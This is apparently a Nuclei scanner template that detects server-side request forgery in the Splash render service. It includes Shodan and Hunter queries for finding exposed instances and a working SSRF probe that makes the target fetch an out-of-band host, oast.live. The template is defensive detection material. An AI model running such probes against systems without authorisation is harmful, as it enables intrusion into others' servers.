id: splash-render-ssrf info: name: Splash Render - SSRF author: pwnhxl severity: high reference: - https://github.com/scrapinghub/splash - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/ metadata: verified: true max-request: 1 shodan-query: title:"Splash" hunter-query: web.title="Splash" && header="TwistedWeb" tags: splash,ssrf,oast,oss http: - method: GET path: - "{{BaseURL}}/render.html?url=https://oast.live" matchers-condition: and matchers: - type: word part: body words: - 'Interactsh Server' - type: status status: - 200 # digest: 490a004630440220206aad931691b60fd9a893518d3591b055bd1ef3b7fd08d2440202ebd27a14ea022015f1d33232c0b8efd66da49f4563d5394f5c8520d37a4c178cca6be0654bbf8f:922c64590222798bb761d5b6d8e72950